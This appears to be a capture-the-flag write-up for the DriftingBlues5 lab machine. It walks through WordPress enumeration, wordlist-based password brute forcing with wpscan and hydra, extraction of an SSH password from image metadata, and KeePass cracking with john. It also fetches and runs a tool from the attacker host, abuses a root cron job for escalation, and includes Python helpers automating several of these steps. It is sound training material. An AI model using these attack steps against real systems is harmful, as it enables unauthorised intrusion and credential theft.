
HMV-Driftingblues5

HMV-Driftingblues5 box retrospective

Port scanning

┌──(root㉿kakeru)-[~/tmp]
└─# nmap -p- 192.168.64.174
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-06 18:11 CST
Nmap scan report for bogon (192.168.64.174)
Host is up (0.067s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: C8:21:58:16:CF:C4 (Intel Corporate)

Only these two common ports are open, so go straight to enumerating web directories.

Web enumeration

┌──(root㉿kakeru)-[~/tmp]
└─# dirsearch -u 192.168.64.174
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/tmp/reports/_192.168.64.174/_25-04-06_18-12-11.txt

Target: http://192.168.64.174/

[18:12:11] Starting:
[18:12:14] 403 - 279B - /.ht_wsr.txt
[18:12:14] 403 - 279B - /.htaccess.bak1
[18:12:14] 403 - 279B - /.htaccess.sample
[18:12:14] 403 - 279B - /.htaccess.save
[18:12:14] 403 - 279B - /.htaccess.orig
[18:12:14] 403 - 279B - /.htaccessBAK
[18:12:14] 403 - 279B - /.htaccess_extra
[18:12:14] 403 - 279B - /.htaccessOLD
[18:12:14] 403 - 279B - /.htaccess_sc
[18:12:14] 403 - 279B - /.htaccess_orig
[18:12:14] 403 - 279B - /.htaccessOLD2
[18:12:14] 403 - 279B - /.html
[18:12:14] 403 - 279B - /.htm
[18:12:14] 403 - 279B - /.htpasswd_test
[18:12:14] 403 - 279B - /.htpasswds
[18:12:14] 403 - 279B - /.httr-oauth
[18:12:15] 403 - 279B - /.php
[18:12:26] 301 - 0B - /index.php -> http://192.168.64.174/
[18:12:26] 404 - 10KB - /index.php/login/
[18:12:27] 200 - 7KB - /license.txt
[18:12:33] 200 - 3KB - /readme.html
[18:12:34] 403 - 279B - /server-status/
[18:12:34] 403 - 279B - /server-status
[18:12:37] 301 - 319B - /wp-admin -> http://192.168.64.174/wp-admin/
[18:12:37] 301 - 321B - /wp-content -> http://192.168.64.174/wp-content/
[18:12:37] 500 - 0B - /wp-admin/
[18:12:37] 200 - 0B - /wp-content/
[18:12:37] 200 - 477B - /wp-content/uploads/
[18:12:37] 200 - 481B - /wp-content/upgrade/
[18:12:37] 500 - 0B - /wp-admin/admin-ajax.php
[18:12:37] 500 - 0B - /wp-config.php
[18:12:37] 500 - 0B - /wp-content/plugins/hello.php
[18:12:37] 200 - 84B - /wp-content/plugins/akismet/akismet.php
[18:12:37] 301 - 322B - /wp-includes -> http://192.168.64.174/wp-includes/
[18:12:37] 200 - 0B - /wp-includes/rss-functions.php
[18:12:38] 200 - 4KB - /wp-includes/
[18:12:38] 500 - 0B - /wp-cron.php
[18:12:38] 500 - 0B - /wp-admin/install.php
[18:12:38] 500 - 0B - /wp-login.php
[18:12:38] 500 - 0B - /wp-signup.php
[18:12:38] 500 - 0B - /wp-admin/setup-config.php
[18:12:38] 500 - 0B - /xmlrpc.php

Every path that turns up is WordPress, so run wpscan to enumerate usernames and plugins. The box is old, though, so try to get by without plugin vulnerabilities; the only plugin it finds is an outdated akismet.

┌──(root㉿kakeru)-[~/tmp]
└─# wpscan --url 192.168.64.174 --api-token <redacted> --enumerate u,ap --plugins-detection aggressive

[+] Enumerating All Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:09:58 <=============================> (109869 / 109869) 100.00% Time: 00:09:58
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
| Location: http://192.168.64.174/wp-content/plugins/akismet/
| Last Updated: 2025-02-14T18:49:00.000Z
| Readme: http://192.168.64.174/wp-content/plugins/akismet/readme.txt
| [!] The version is out of date, the latest version is 5.3.7
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.64.174/wp-content/plugins/akismet/, status: 200
|
| Version: 4.1.8 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.64.174/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.64.174/wp-content/plugins/akismet/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=====================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] abuzerkomurcu
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://192.168.64.174/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] satanic
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] gill
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] collins
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] gadd
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 3
| Requests Remaining: 22

[+] Finished: Sun Apr 6 18:28:22 2025
[+] Requests Done: 109915
[+] Cached Requests: 42
[+] Data Sent: 29.409 MB
[+] Data Received: 15.111 MB
[+] Memory used: 429.746 MB
[+] Elapsed time: 00:10:08

Save the enumerated usernames to a file (a.txt below).
This is the first place I got stuck: with a generic wordlist and this many usernames, brute forcing takes far too long. From a walkthrough I learned about cewl, which builds a wordlist from the words found on the target's own web pages.

┌──(root㉿kakeru)-[~/tmp]
└─# cewl -d 2 -m 6 -w pass.txt --with-numbers 192.168.64.174
CeWL 6.2.1 (More Fixes) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

┌──(root㉿kakeru)-[~/tmp]
└─# cat pass.txt | wc -l
937

The wordlist built this way has only 937 entries (spider depth 2, minimum length 6, words containing digits allowed).
It does yield one valid username and password, but as explained below they are not actually needed.
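To make those cewl options concrete, here is an added example (my own code, not cewl itself and not from the original post) that builds a wordlist the same way: visible page text only, a minimum word length matching -m 6, and an optional --with-numbers mode. cewl's spidering (-d 2) is left out, so it takes already-fetched pages; the HTML below is constructed for the example.

```python
"""Minimal cewl-style wordlist builder (added example, not cewl's own code)."""
import re
from html.parser import HTMLParser


class _VisibleText(HTMLParser):
    """Collect text nodes, skipping <script> and <style> bodies (cewl only
    spiders what a visitor would read, not tracker tokens in JavaScript)."""

    def __init__(self):
        super().__init__()
        self.parts = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.parts.append(data)


def build_wordlist(pages, min_len=6, with_numbers=False):
    """Return a sorted, de-duplicated candidate list from a list of HTML pages.

    min_len mirrors cewl -m; with_numbers mirrors --with-numbers, which keeps
    tokens that mix letters and digits instead of splitting on the digits.
    """
    # Without --with-numbers, a digit is a separator: "ABC123XYZ" -> ABC, XYZ.
    token = r"[A-Za-z0-9]+" if with_numbers else r"[A-Za-z]+"
    words = set()
    for html in pages:
        parser = _VisibleText()
        parser.feed(html)
        for tok in re.findall(token, " ".join(parser.parts)):
            if len(tok) >= min_len:
                words.add(tok)
    return sorted(words)


# Constructed sample page; "interchangeable" is the password the real wordlist hit.
SAMPLE_HTML = """<html><head><title>Driftingblues</title>
<script>var tracker = "analyticsToken1234";</script></head>
<body><h1>Drifting Blues</h1>
<p>Parts on the boat are interchangeable; reorder them via code ABC123XYZ.</p>
</body></html>"""


if __name__ == "__main__":
    # Equivalent of: cewl -m 6 -w pass.txt --with-numbers <url>
    for word in build_wordlist([SAMPLE_HTML], min_len=6, with_numbers=True):
        print(word)
```

Feeding wpscan a list like this is only as good as the site's content; the hit here ("interchangeable") is a plain dictionary word that happened to be on the page, which is exactly the case cewl is built for.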


┌──(root㉿kakeru)-[~/tmp]
└─# wpscan --url 192.168.64.174 -U a.txt -P pass.txt

[+] Performing password attack on Wp Login against 6 user/s
[SUCCESS] - gill / interchangeable
Trying / Author Time: 00:05:18 <===================================== > (5055 / 5991) 84.37% ETA: ??:??:??


This is the second place I got stuck. After logging in to wp-admin as gill there is no useful information and nowhere to drop a PHP reverse shell.
What actually matters is the image dblogo.png.

That image can also be fetched straight from the open /wp-content/uploads/ directory listing that dirsearch found, which is why the username and password are not really needed.
Download the odd-looking image and run exiftool on it: the metadata carries an SSH password.

┌──(root㉿kakeru)-[~/tmp]
└─# exiftool dblogo.png
ExifTool Version Number : 13.00
File Name : dblogo.png
Directory : .
File Size : 19 kB
File Modification Date/Time : 2025:04:06 18:43:24+08:00
File Access Date/Time : 2025:04:06 18:45:07+08:00
File Inode Change Date/Time : 2025:04:06 18:45:07+08:00
File Permissions : -rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 300
Image Height : 300
Bit Depth : 8
Color Type : RGB with Alpha
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
SRGB Rendering : Perceptual
Gamma : 2.2
Pixels Per Unit X : 2835
Pixels Per Unit Y : 2835
Pixel Units : meters
XMP Toolkit : Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39
Creator Tool : Adobe Photoshop CC 2018 (Windows)
Create Date : 2021:02:24 02:55:28+03:00
Metadata Date : 2021:02:24 02:55:28+03:00
Modify Date : 2021:02:24 02:55:28+03:00
Instance ID : xmp.iid:562b80d4-fe12-8541-ae0c-6a21e7859405
Document ID : adobe:docid:photoshop:7232d876-a1d0-044b-9604-08837143888b
Original Document ID : xmp.did:5890be6c-649b-0248-af9b-19889727200c
Color Mode : RGB
ICC Profile Name : sRGB IEC61966-2.1
Format : image/png
History Action : created, saved
History Instance ID : xmp.iid:5890be6c-649b-0248-af9b-19889727200c, xmp.iid:562b80d4-fe12-8541-ae0c-6a21e7859405
History When : 2021:02:24 02:55:28+03:00, 2021:02:24 02:55:28+03:00
History Software Agent : Adobe Photoshop CC 2018 (Windows), Adobe Photoshop CC 2018 (Windows)
History Changed : /
Text Layer Name : ssh password is 59583hello of course it is lowercase maybe not
Text Layer Text : ssh password is 59583hello of course it is lowercase maybe not :)
Document Ancestors : adobe:docid:photoshop:871a8adf-5521-894c-8a18-2b27c91a893b
Image Size : 300x300
Megapixels : 0.090
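exiftool reads those Text Layer fields out of the XMP packet that Photoshop stores in a PNG iTXt chunk. As an added example (my own code, not part of the original post and not exiftool), this parser walks the PNG chunk table, verifies each CRC, pulls the text out of tEXt, zTXt and iTXt chunks, and greps it for password-like strings. The PNG bytes are constructed inline to carry a layer-text string in the same shape as the one above; the real dblogo.png is not embedded.

```python
"""Extract textual chunks from a PNG and grep them for secrets (added example)."""
import re
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one chunk: 4-byte length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def iter_chunks(png: bytes):
    """Yield (type, data) for every chunk, rejecting bad signatures and CRCs."""
    if not png.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    while pos + 8 <= len(png):
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        data = png[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", png[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + data) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC in {ctype!r} chunk")
        yield ctype, data
        pos += 12 + length
        if ctype == b"IEND":
            break


def text_fields(png: bytes) -> dict:
    """Return {keyword: text} for tEXt, zTXt and iTXt chunks, inflating as needed."""
    out = {}
    for ctype, data in iter_chunks(png):
        if ctype == b"tEXt":                       # keyword\0 latin-1 text
            key, _, text = data.partition(b"\x00")
            out[key.decode("latin-1")] = text.decode("latin-1")
        elif ctype == b"zTXt":                     # keyword\0 method(1) zlib-data
            key, _, rest = data.partition(b"\x00")
            out[key.decode("latin-1")] = zlib.decompress(rest[1:]).decode("latin-1")
        elif ctype == b"iTXt":                     # keyword\0 flag method lang\0 tkw\0 utf-8 text
            key, _, rest = data.partition(b"\x00")
            comp_flag = rest[0]
            _lang, _, rest = rest[2:].partition(b"\x00")
            _translated, _, text = rest.partition(b"\x00")
            if comp_flag == 1:
                text = zlib.decompress(text)
            out[key.decode("latin-1")] = text.decode("utf-8")
    return out


def find_secrets(png: bytes, pattern=r'(?i)(password|passwd|pwd)[^<"\n]*') -> list:
    """Grep every text field for password-like phrases; returns the matches."""
    hits = []
    for text in text_fields(png).values():
        hits.extend(m.group(0).strip() for m in re.finditer(pattern, text))
    return hits


# Constructed 1x1 RGBA PNG whose XMP packet carries a Photoshop text layer,
# mirroring the dblogo.png finding above (assumed layout, not the real file).
_XMP = (
    '<x:xmpmeta xmlns:x="adobe:ns:meta/"><rdf:RDF><photoshop:TextLayers>'
    '<rdf:li photoshop:LayerText="ssh password is 59583hello of course it is lowercase maybe not :)"/>'
    '</photoshop:TextLayers></rdf:RDF></x:xmpmeta>'
)
SAMPLE_PNG = (
    PNG_SIG
    + _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 6, 0, 0, 0))
    + _chunk(b"iTXt", b"XML:com.adobe.xmp\x00\x00\x00\x00\x00" + _XMP.encode())
    + _chunk(b"tEXt", b"Comment\x00nothing to see here")
    + _chunk(b"IDAT", zlib.compress(b"\x00\x00\x00\x00\x00"))
    + _chunk(b"IEND", b"")
)


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PNG
    for hit in find_secrets(blob):
        print(hit)
```

Run it as `python3 pngtext.py dblogo.png` to check a real file. The CRC check matters in practice: a chunk that fails it is either corrupted or deliberately hand-edited, and both are worth a second look during an investigation.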

The password is 59583hello (the hint says "lowercase maybe not", but lowercase works). Spray it across the user list with hydra to find which SSH account it belongs to; hydra's suggestion of -t 4 for SSH is worth following on anything with rate limiting.

┌──(root㉿kakeru)-[~/tmp]
└─# hydra -L a.txt -p 59583hello ssh://192.168.64.174
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-06 18:45:47
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:6/p:1), ~1 try per task
[DATA] attacking ssh://192.168.64.174:22/
[22][ssh] host: 192.168.64.174 login: gill password: 59583hello
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-06 18:46:01

Privilege escalation

As usual, first check sudo rights (sudo -l) and SUID binaries; there is nothing in either.

gill@driftingblues:~$ ls -al
total 24
drwxr-xr-x 4 gill gill 4096 Apr 6 05:45 .
drwxr-xr-x 3 root root 4096 Feb 24 2021 ..
drwx------ 3 gill gill 4096 Apr 6 05:45 .gnupg
-rwx------ 1 gill gill 2030 Feb 24 2021 keyfile.kdbx
drwx------ 2 gill gill 4096 Feb 24 2021 .ssh
-r-x------ 1 gill gill 32 Feb 24 2021 user.txt

The interesting file is keyfile.kdbx. Asking an AI confirmed what the extension suggests: a KeePass 2.x password database.
KeePass is an open-source password manager that keeps credentials encrypted (AES here, as john reports below) under a key derived from the master password.
Because the key derivation is offline, the master password can be attacked with john.

┌──(root㉿kakeru)-[~/tmp]
└─# keepass2john keyfile.kdbx > hash

┌──(root㉿kakeru)-[~/tmp]
└─# john hash -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
porsiempre (keyfile)
1g 0:00:00:13 DONE (2025-04-06 20:10) 0.07496g/s 518.1p/s 518.1c/s 518.1C/s polly..better
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

With the master password in hand, install a KeePass client to open the database (the GUI is used here; keepassxc-cli ls keyfile.kdbx would list the entry titles from a terminal).

┌──(root㉿kakeru)-[~/tmp]
└─# apt install keepassxc

After entering the password the database shows a set of entry titles.

None of them is the root password, and what follows is odd; it is not something you reach by ordinary reasoning.
First, fetch pspy64 from the attacking machine to look at scheduled tasks.

┌──(root㉿kakeru)-[~/tmp]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.64.174 - - [06/Apr/2025 20:15:24] "GET /pspy64 HTTP/1.1" 200 -

gill@driftingblues:~$ wget 192.168.64.11/pspy64
--2025-04-06 07:15:22-- http://192.168.64.11/pspy64
Connecting to 192.168.64.11:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64 100%[=========================================================================>] 2.96M 1.01MB/s in 2.9s

2025-04-06 07:15:27 (1.01 MB/s) - ‘pspy64’ saved [3104768/3104768]

gill@driftingblues:~$ chmod +x pspy64

Once it is running, a cron job shows up:

2025/04/06 07:16:20 CMD: UID=0 PID=1 | /sbin/init
2025/04/06 07:17:01 CMD: UID=0 PID=696 | /usr/sbin/CRON -f
2025/04/06 07:17:01 CMD: UID=0 PID=695 | /usr/sbin/cron -f
2025/04/06 07:17:01 CMD: UID=0 PID=697 | /usr/sbin/CRON -f
2025/04/06 07:17:01 CMD: UID=0 PID=698 | /usr/sbin/CRON -f
2025/04/06 07:17:01 CMD: UID=0 PID=699 | /bin/sh -c cd / && run-parts --report /etc/cron.hourly
2025/04/06 07:17:01 CMD: UID=0 PID=700 | /bin/sh -c /root/key.sh
2025/04/06 07:17:01 CMD: UID=0 PID=701 | /bin/ /root/key.sh

There is a /root/key.sh that cron runs as root every minute. A script with that name and schedule is usually checking for the presence of some file.

gill@driftingblues:/$ ls -al
total 69
drwxr-xr-x 19 root root 4096 Feb 24 2021 .
drwxr-xr-x 19 root root 4096 Feb 24 2021 ..
lrwxrwxrwx 1 root root 7 Dec 17 2020 bin -> usr/bin
drwxr-xr-x 3 root root 4096 Dec 17 2020 boot
drwxr-xr-x 17 root root 3260 Apr 6 07:04 dev
drwxr-xr-x 73 root root 4096 Apr 6 07:04 etc
drwxr-xr-x 3 root root 4096 Feb 24 2021 home
lrwxrwxrwx 1 root root 31 Dec 17 2020 initrd.img -> boot/initrd.img-4.19.0-13-amd64
lrwxrwxrwx 1 root root 31 Dec 17 2020 initrd.img.old -> boot/initrd.img-4.19.0-13-amd64
drwx---rwx 2 root root 4096 Feb 24 2021 keyfolder
lrwxrwxrwx 1 root root 7 Dec 17 2020 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Dec 17 2020 lib32 -> usr/lib32
lrwxrwxrwx 1 root root 9 Dec 17 2020 lib64 -> usr/lib64
lrwxrwxrwx 1 root root 10 Dec 17 2020 libx32 -> usr/libx32
drwx------ 2 root root 16384 Dec 17 2020 lost+found
drwxr-xr-x 3 root root 4096 Dec 17 2020 media
drwxr-xr-x 2 root root 4096 Dec 17 2020 mnt
drwxr-xr-x 2 root root 4096 Dec 17 2020 opt
dr-xr-xr-x 88 root root 0 Apr 6 07:04 proc
drwx------ 2 root root 4096 Feb 24 2021 root
drwxr-xr-x 18 root root 540 Apr 6 07:14 run
lrwxrwxrwx 1 root root 8 Dec 17 2020 sbin -> usr/sbin
drwxr-xr-x 2 root root 4096 Dec 17 2020 srv
dr-xr-xr-x 13 root root 0 Apr 6 07:04 sys
drwxrwxrwt 9 root root 1024 Apr 6 07:09 tmp
drwxr-xr-x 13 root root 4096 Dec 17 2020 usr
drwxr-xr-x 13 root root 4096 Dec 17 2020 var
lrwxrwxrwx 1 root root 28 Dec 17 2020 vmlinuz -> boot/vmlinuz-4.19.0-13-amd64
lrwxrwxrwx 1 root root 28 Dec 17 2020 vmlinuz.old -> boot/vmlinuz-4.19.0-13-amd64

In the root of the filesystem there is a /keyfolder directory. It is owned by root but mode drwx---rwx, so any user can create files in it. The next step is to create files there named after the KeePass entry titles, working from the last title backwards (which finds the right one sooner here).
After each file, run pspy64 again and watch what happens when the cron job fires.
One more trap: delete the previous attempt first. The check only passes when the folder holds a single file.

gill@driftingblues:/keyfolder$ ls
fracturedocean
gill@driftingblues:/keyfolder$ /home/gill/pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d



Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2025/04/06 07:24:20 CMD: UID=1000 PID=783 | /home/gill/pspy64
2025/04/06 07:24:20 CMD: UID=0 PID=725 |
2025/04/06 07:24:20 CMD: UID=0 PID=702 |
2025/04/06 07:24:20 CMD: UID=1000 PID=675 | -bash
2025/04/06 07:24:20 CMD: UID=1000 PID=674 | sshd: gill@pts/0
2025/04/06 07:24:20 CMD: UID=1000 PID=661 | (sd-pam)
2025/04/06 07:24:20 CMD: UID=1000 PID=660 | /lib/systemd/systemd --user
2025/04/06 07:24:20 CMD: UID=0 PID=657 | sshd: gill [priv]
2025/04/06 07:24:20 CMD: UID=0 PID=656 |
2025/04/06 07:24:20 CMD: UID=33 PID=484 | /usr/sbin/apache2 -k start
2025/04/06 07:24:20 CMD: UID=33 PID=483 | /usr/sbin/apache2 -k start
2025/04/06 07:24:20 CMD: UID=33 PID=482 | /usr/sbin/apache2 -k start
2025/04/06 07:24:20 CMD: UID=33 PID=481 | /usr/sbin/apache2 -k start
2025/04/06 07:24:20 CMD: UID=33 PID=480 | /usr/sbin/apache2 -k start
2025/04/06 07:24:20 CMD: UID=0 PID=477 | /usr/sbin/apache2 -k start
2025/04/06 07:24:20 CMD: UID=106 PID=476 | /usr/sbin/mysqld
2025/04/06 07:24:20 CMD: UID=0 PID=417 | /usr/sbin/sshd -D
2025/04/06 07:24:20 CMD: UID=0 PID=409 | /sbin/agetty -o -p -- \u --noclear tty1 linux
2025/04/06 07:24:20 CMD: UID=0 PID=388 | /lib/systemd/systemd-logind
2025/04/06 07:24:20 CMD: UID=0 PID=384 | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
2025/04/06 07:24:20 CMD: UID=104 PID=383 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2025/04/06 07:24:20 CMD: UID=0 PID=382 | /usr/sbin/rsyslogd -n -iNONE
2025/04/06 07:24:20 CMD: UID=0 PID=381 | /usr/sbin/cron -f
2025/04/06 07:24:20 CMD: UID=101 PID=356 | /lib/systemd/systemd-timesyncd
2025/04/06 07:24:20 CMD: UID=0 PID=348 |
2025/04/06 07:24:20 CMD: UID=0 PID=347 |
2025/04/06 07:24:20 CMD: UID=0 PID=345 |
2025/04/06 07:24:20 CMD: UID=0 PID=344 |
2025/04/06 07:24:20 CMD: UID=0 PID=339 |
2025/04/06 07:24:20 CMD: UID=0 PID=337 |
2025/04/06 07:24:20 CMD: UID=0 PID=281 |
2025/04/06 07:24:20 CMD: UID=0 PID=280 |
2025/04/06 07:24:20 CMD: UID=0 PID=235 | /lib/systemd/systemd-udevd
2025/04/06 07:24:20 CMD: UID=0 PID=220 | /lib/systemd/systemd-journald
2025/04/06 07:24:20 CMD: UID=0 PID=187 |
2025/04/06 07:24:20 CMD: UID=0 PID=186 |
2025/04/06 07:24:20 CMD: UID=0 PID=184 |
2025/04/06 07:24:20 CMD: UID=0 PID=153 |
2025/04/06 07:24:20 CMD: UID=0 PID=116 |
2025/04/06 07:24:20 CMD: UID=0 PID=114 |
2025/04/06 07:24:20 CMD: UID=0 PID=113 |
2025/04/06 07:24:20 CMD: UID=0 PID=111 |
2025/04/06 07:24:20 CMD: UID=0 PID=110 |
2025/04/06 07:24:20 CMD: UID=0 PID=109 |
2025/04/06 07:24:20 CMD: UID=0 PID=108 |
2025/04/06 07:24:20 CMD: UID=0 PID=106 |
2025/04/06 07:24:20 CMD: UID=0 PID=59 |
2025/04/06 07:24:20 CMD: UID=0 PID=50 |
2025/04/06 07:24:20 CMD: UID=0 PID=49 |
2025/04/06 07:24:20 CMD: UID=0 PID=48 |
2025/04/06 07:24:20 CMD: UID=0 PID=30 |
2025/04/06 07:24:20 CMD: UID=0 PID=29 |
2025/04/06 07:24:20 CMD: UID=0 PID=28 |
2025/04/06 07:24:20 CMD: UID=0 PID=27 |
2025/04/06 07:24:20 CMD: UID=0 PID=26 |
2025/04/06 07:24:20 CMD: UID=0 PID=25 |
2025/04/06 07:24:20 CMD: UID=0 PID=24 |
2025/04/06 07:24:20 CMD: UID=0 PID=23 |
2025/04/06 07:24:20 CMD: UID=0 PID=22 |
2025/04/06 07:24:20 CMD: UID=0 PID=21 |
2025/04/06 07:24:20 CMD: UID=0 PID=20 |
2025/04/06 07:24:20 CMD: UID=0 PID=19 |
2025/04/06 07:24:20 CMD: UID=0 PID=18 |
2025/04/06 07:24:20 CMD: UID=0 PID=17 |
2025/04/06 07:24:20 CMD: UID=0 PID=16 |
2025/04/06 07:24:20 CMD: UID=0 PID=15 |
2025/04/06 07:24:20 CMD: UID=0 PID=14 |
2025/04/06 07:24:20 CMD: UID=0 PID=13 |
2025/04/06 07:24:20 CMD: UID=0 PID=12 |
2025/04/06 07:24:20 CMD: UID=0 PID=11 |
2025/04/06 07:24:20 CMD: UID=0 PID=10 |
2025/04/06 07:24:20 CMD: UID=0 PID=9 |
2025/04/06 07:24:20 CMD: UID=0 PID=8 |
2025/04/06 07:24:20 CMD: UID=0 PID=6 |
2025/04/06 07:24:20 CMD: UID=0 PID=4 |
2025/04/06 07:24:20 CMD: UID=0 PID=3 |
2025/04/06 07:24:20 CMD: UID=0 PID=2 |
2025/04/06 07:24:20 CMD: UID=0 PID=1 | /sbin/init
2025/04/06 07:25:01 CMD: UID=0 PID=790 | /usr/sbin/CRON -f
2025/04/06 07:25:01 CMD: UID=0 PID=791 | /usr/sbin/CRON -f
2025/04/06 07:25:01 CMD: UID=0 PID=792 | /bin/sh -c /root/key.sh
2025/04/06 07:25:01 CMD: UID=0 PID=793 | /bin/bash /root/key.sh
2025/04/06 07:25:03 CMD: UID=0 PID=794 |
^CExiting program... (interrupt)
gill@driftingblues:/keyfolder$ ls
fracturedocean rootcreds.txt
gill@driftingblues:/keyfolder$ cat rootcreds.txt
root creds

imjustdrifting31

The second-to-last title is the one that passes: once the cron job runs with only that file in place, a new rootcreds.txt appears in the folder containing the root password.
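The step the walkthrough glosses over is really a serial oracle: one candidate filename per cron tick, the folder otherwise empty, success signalled by a new file. As an added example (my own code, not from the original post), this script automates that loop. The real /root/key.sh is not readable, so simulated_key_sh is an assumption inferred from the behaviour above and stands in for the cron job so the loop can be exercised offline; only fracturedocean among the candidate titles is taken from the page, the others are placeholders. On the box you would pass KEYFOLDER as the folder and wait_for_next_cron_tick as the trigger.

```python
"""Serial filename probe against a root cron check on /keyfolder (added example)."""
import tempfile
import time
from pathlib import Path

KEYFOLDER = Path("/keyfolder")   # root-owned, mode drwx---rwx: anyone can create files
RESULT = "rootcreds.txt"         # file that appeared once the right name was in place

# Entry titles read from keyfile.kdbx. Only "fracturedocean" is from the page;
# the others are constructed placeholders, placed so the winner is second-to-last.
CANDIDATES = ["alpha", "bravo", "fracturedocean", "zulu"]


def wait_for_next_cron_tick(slack: float = 3.0) -> None:
    """Real trigger: /root/key.sh fires at :01 of every minute, so sleep past it."""
    time.sleep(60 - (time.time() % 60) + slack)


def simulated_key_sh(folder: Path, expected: str = "fracturedocean") -> None:
    """Stand-in for /root/key.sh. Assumed logic, not the real script: the folder
    must contain exactly one file, named after the right KeePass entry; then
    the root credentials are written next to it."""
    names = sorted(p.name for p in folder.iterdir())
    if names == [expected]:
        (folder / RESULT).write_text("root creds\n\nimjustdrifting31\n")


def probe(folder: Path, candidates, trigger):
    """Try candidates from the last title backwards, one file at a time.
    Returns (winning_name, creds_text) or (None, None)."""
    for name in reversed(list(candidates)):
        # The check fails if anything else is present, so clear the previous
        # attempt (and any stale result) before placing the next name.
        for stale in folder.iterdir():
            if stale.is_file():
                stale.unlink()
        (folder / name).touch()
        trigger()                       # block until the root cron job has run
        result = folder / RESULT
        if result.is_file():
            return name, result.read_text()
    return None, None


def demo(candidates=CANDIDATES):
    """Run the loop offline against the simulated checker in a temp directory."""
    tmp = Path(tempfile.mkdtemp())
    return probe(tmp, candidates, lambda: simulated_key_sh(tmp))


if __name__ == "__main__":
    # On the box: probe(KEYFOLDER, titles_from_keepass, wait_for_next_cron_tick)
    print(demo())
```

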